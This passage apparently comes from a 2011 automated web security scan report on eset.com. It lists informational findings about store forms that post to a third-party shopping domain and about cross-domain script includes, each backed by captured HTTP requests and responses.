Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_3" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.7. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.8. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
</div>
<form id="ns_form_6" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

6. Cross-domain script include  previous  next
There are 24 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Thu, 16-Jun-2011 14:15:36 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Sun, 17 Apr 2011 14:15:36 GMT
X-Varnish: 1858168103
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

6.2. http://www.eset.com/us/activate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/activate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/activate HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11110
Date: Sun, 17 Apr 2011 14:15:36 GMT
X-Varnish: 1858168113
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.3. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Sun, 17 Apr 2011 14:15:36 GMT
X-Varnish: 1858168126
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.4. http://www.eset.com/us/company  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15271
Date: Sun, 17 Apr 2011 12:59:10 GMT
X-Varnish: 1857995525
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.5. http://www.eset.com/us/company/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company/contact HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19260
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168134
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>C
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.6. http://www.eset.com/us/company/fun-stuff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/fun-stuff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company/fun-stuff HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13574
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168148
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.7. http://www.eset.com/us/company/legal-notices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/legal-notices

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company/legal-notices HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19039
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168165
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.8. http://www.eset.com/us/company/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/privacy-policy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/company/privacy-policy HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25601
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168183
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.9. http://www.eset.com/us/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 121183
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168244
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.10. http://www.eset.com/us/download/free-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download/free-trial HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16306
Date: Sun, 17 Apr 2011 14:15:38 GMT
X-Varnish: 1858168264
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>B
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.11. http://www.eset.com/us/download/free-trial/nod32-antivirus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21405
Date: Sun, 17 Apr 2011 14:15:38 GMT
X-Varnish: 1858168318
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.12. http://www.eset.com/us/download/free-trial/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/smart-security

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/download/free-trial/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21516
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168611
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.13. http://www.eset.com/us/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
